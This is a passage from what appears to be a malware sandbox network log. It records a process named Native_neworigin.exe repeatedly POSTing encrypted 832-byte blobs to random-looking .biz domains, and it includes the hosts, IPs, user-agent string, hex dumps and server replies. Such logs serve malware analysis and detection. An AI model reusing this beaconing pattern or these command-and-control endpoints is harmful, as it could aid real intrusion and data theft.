                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:34.293111086 CET358OUTPOST /rofptsppofgiww HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: gytujflc.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:34.293147087 CET832OUTData Raw: ad 92 d5 2a 00 71 f5 d4 34 03 00 00 a4 02 02 53 80 02 97 37 32 f6 c3 ab 9e 03 e3 9a 4d 97 dd fb 6b 2d a2 5b ed 34 f4 48 91 3e 03 53 71 5e 08 d4 ff c5 f0 44 dc 0e 8c 3d 17 c5 03 72 88 a4 9b f9 e0 36 be 63 a9 92 9f b4 c8 f8 85 0c b7 6c 9e e0 36 21
                                                                                                                                                                                                                                                                                                                                Data Ascii: *q4S72Mk-[4H>Sq^D=r6cl6!}/X t(;w>Mr5Sl44ZlSr~g U(1?\1e&VdU``4cG0n<]P}r;3>
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:34.408735037 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:26:34 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Content-Length: 580
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                37192.168.2.55002013.251.16.150802676C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:34.559005976 CET354OUTPOST /uiwlhtxrxipw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: qaynky.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:34.559046030 CET832OUTData Raw: 94 51 20 12 cd d6 41 dd 34 03 00 00 ce 76 41 9b 13 d2 da a2 c1 9d c2 e9 bc 8e b7 96 af d4 f2 40 f8 7e 68 42 ff fc 5a ad 6c cf 8a 26 d0 d3 a8 a0 b1 00 8f 76 a0 85 d2 64 12 f0 f1 45 9e 9e 0d 95 04 90 f7 36 fc 2a 1b b2 82 8b 90 e9 a4 f3 8e fd b0 ae
                                                                                                                                                                                                                                                                                                                                Data Ascii: Q A4vA@~hBZl&vdE6*!}u)m)UBwMg>>)F>E*oztzxc.eO)N_ si#c@)So.0XN&ajZb|c]
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:35.982280970 CET408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:26:35 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Set-Cookie: btst=e741a1da368308280773996bca7da989|8.46.123.75|1732094795|1732094795|0|1|0; path=/; domain=.qaynky.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                38192.168.2.55002144.221.84.105802676C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:36.293088913 CET357OUTPOST /gvskbqofkpgv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: bumxkqgxu.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:36.293121099 CET832OUTData Raw: bd ca 82 70 53 d4 48 b4 34 03 00 00 f2 07 f2 42 dd e0 8d 9a 8b 9b 95 e8 90 05 2a b3 21 e1 4e 1e fd 89 22 73 30 da 4c cc 89 f6 fc bd d6 5a 4c 2b 24 04 c6 cc 04 e1 34 9c 1e 4c 71 b8 61 f5 14 0d 3a f5 b7 fa ef fa 92 43 e6 1b 65 ac 59 c0 be 77 9b 67
                                                                                                                                                                                                                                                                                                                                Data Ascii: pSH4B*!N"s0LZL+$4Lqa:CeYwg-o6VI'.\tYqT6n=]$xox*zwl<4Bx>kj-c3,)k&>eaKK->q}D:Y5?`p[|6d{='e_{
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:36.747081041 CET411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:26:36 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Set-Cookie: btst=c01eb1cbcf03999be4fb94e911b91315|8.46.123.75|1732094796|1732094796|0|1|0; path=/; domain=.bumxkqgxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                39192.168.2.55002254.244.188.177802676C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:36.918621063 CET357OUTPOST /sbnrqyxuvimud HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: dwrqljrr.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:36.918658018 CET832OUTData Raw: 50 69 d4 5d 98 d6 fe cf 34 03 00 00 e7 94 a1 b4 b7 9c 7b cd 88 fa fa ec bb 29 b6 87 95 de 45 b7 84 05 49 2d 5e e9 66 01 74 3d b1 fc ec 8b b6 0d 0a 9a b5 0b f7 36 70 e4 c3 e0 3d 43 2c 35 2f 5e 8c a8 ad 37 1b e7 ec 28 e2 a6 b2 ff 41 35 a7 21 73 a8
                                                                                                                                                                                                                                                                                                                                Data Ascii: Pi]4{)EI-^ft=6p=C,5/^7(A5!s_@F^9?`hH@e0mF#KJ_Chz'1Ds+m$ <}.cGqzFf{ClxwN"^IE`.Ft3tR@h)[|`KTM9qhUpX/od
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:37.644460917 CET410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:26:37 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Set-Cookie: btst=d665a79a45b690e40088704e42be4db1|8.46.123.75|1732094797|1732094797|0|1|0; path=/; domain=.dwrqljrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                40192.168.2.55002335.164.78.200802676C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:37.915445089 CET343OUTPOST /s HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: nqwjmb.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:37.915488958 CET832OUTData Raw: 33 96 0c bc a6 68 58 d4 34 03 00 00 e0 5d 7d ba d2 89 c5 85 1a b7 83 05 fb 5a 03 91 77 a9 e2 9f 16 8e bc 9c 84 8e 27 16 5b 0d 96 59 93 99 36 92 9d e0 5b 6b 9e 92 1e 50 b8 cc da d9 2e 0b 17 9c 1c 8f 90 9f b0 05 26 af bd d7 8c 02 1c 62 a6 31 f9 1b
                                                                                                                                                                                                                                                                                                                                Data Ascii: 3hX4]}Zw'[Y6[kP.&b1{Y"d0Zz%jliyC%Pe<]Y\>Eh-e3en9Ib BlbAjoe 9{94pZ`<|$\e;b"_rS*
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:38.778750896 CET408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:26:38 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Set-Cookie: btst=3d99bad8fb9f4999ed3cfde99b36aa3f|8.46.123.75|1732094798|1732094798|0|1|0; path=/; domain=.nqwjmb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                41192.168.2.5500243.94.10.34802676C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:39.011897087 CET349OUTPOST /qklr HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: ytctnunms.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:39.011897087 CET832OUTData Raw: 86 46 0b 60 62 8f dd 25 34 03 00 00 00 a2 6d 6c 43 10 92 e1 64 6f c2 dd e6 30 d2 41 7d 82 27 6c 52 11 52 77 f4 03 fd 29 49 4c 77 e1 66 9b ee 8d fb 10 b4 71 e7 85 da 87 60 1c f7 e3 33 e0 b8 08 98 3f f7 bd 0d 48 af f1 f6 2e bc 6f 7f df c8 ad 32 43
                                                                                                                                                                                                                                                                                                                                Data Ascii: F`b%4mlCdo0A}'lRRw)ILwfq`3?H.o2Cp}3aS`XXW XqjA@rXF(r[4'kRu]M%CFO#CX>'ER@'zq(oikWPht9_V|so'qZ}~&_
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:39.477114916 CET411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:26:39 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Set-Cookie: btst=a71102566414a398ee16bbcf4a3bd5a9|8.46.123.75|1732094799|1732094799|0|1|0; path=/; domain=.ytctnunms.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                42192.168.2.550025165.160.15.20802676C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:39.606312037 CET342OUTPOST /c HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: myups.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:39.606337070 CET832OUTData Raw: d5 43 14 02 07 b9 d3 a3 34 03 00 00 a0 f8 71 70 62 4b c4 ff be c3 07 80 c7 54 c1 ee 79 66 13 4e 32 10 46 c2 3d 56 57 85 45 61 0d 8a a5 42 d2 71 67 9a 6f d2 07 f7 e1 b3 ea 69 db 9d 15 70 96 9c 30 13 18 f9 b2 8c fa a9 24 ea c3 62 3b e7 b9 06 5a d1
                                                                                                                                                                                                                                                                                                                                Data Ascii: C4qpbKTyfN2F=VWEaBqgoip0$b;Z~/q<_ -+^H2p[tVM|m50ZA9W&D%qnJImn9l9E *r@,#F'olIoh6_k]$l;UmdZ
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:40.369534016 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:26:40 GMT
                                                                                                                                                                                                                                                                                                                                Content-Length: 94
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                43192.168.2.550026165.160.15.20802676C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:40.439343929 CET356OUTPOST /rjreynucnxubyan HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: myups.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:40.439369917 CET832OUTData Raw: fe 19 07 ac e1 89 a9 30 34 03 00 00 9a 22 32 53 52 1d 7d 4e 5c 50 f5 d3 81 97 fe 48 f2 4e 7f 8e 45 58 7f e9 dd af 4c 2c cd 04 d8 e5 27 1d dc 44 5a 4e ce 4d 74 22 76 7c d3 d7 af d3 b1 c6 31 5e 6e 42 77 91 c5 02 31 8f ee 3c a7 c4 a1 f5 b4 2f c6 93
                                                                                                                                                                                                                                                                                                                                Data Ascii: 04"2SR}N\PHNEXL,'DZNMt"v|1^nBw1</7gl`&HWWKthUFn+#@}_L;AvCo<kuQd@N s~aI=3kl7Zu+]~ BWOMB+N
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:41.159498930 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:26:41 GMT
                                                                                                                                                                                                                                                                                                                                Content-Length: 94
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                44192.168.2.55002754.244.188.177802676C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:41.390053988 CET355OUTPOST /rsqlwjdrwk HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: oshhkdluh.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:41.391333103 CET832OUTData Raw: 53 cc 84 67 4c e0 87 dc 34 03 00 00 38 4e 2b 5c a3 1a cc 48 74 40 7f 10 45 20 81 55 bd 02 df b2 58 1d 24 02 08 28 cb a1 f9 0a 38 f9 a4 fa a5 ee a1 9e bd b3 56 1a 42 5f a2 8f 5b ae 36 61 ed 47 bc f0 7f 6e 52 c5 ed 45 2f ec 9c 32 63 1e 7f d6 64 4a
                                                                                                                                                                                                                                                                                                                                Data Ascii: SgL48N+\Ht@E UX$(8VB_[6aGnRE/2cdJ-a/{,IaW&x,q^Rx/U(Vx8`fA#8i86I:A|O<i>Dg|\\6y-*V4@W%53#fF|:V}*7
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:42.135647058 CET411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:26:42 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Set-Cookie: btst=03928259540f8d563f6d160e8744ac6a|8.46.123.75|1732094802|1732094802|0|1|0; path=/; domain=.oshhkdluh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                45192.168.2.550028208.100.26.24580
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:42.475188971 CET348OUTPOST /khvhi HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: yunalwv.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
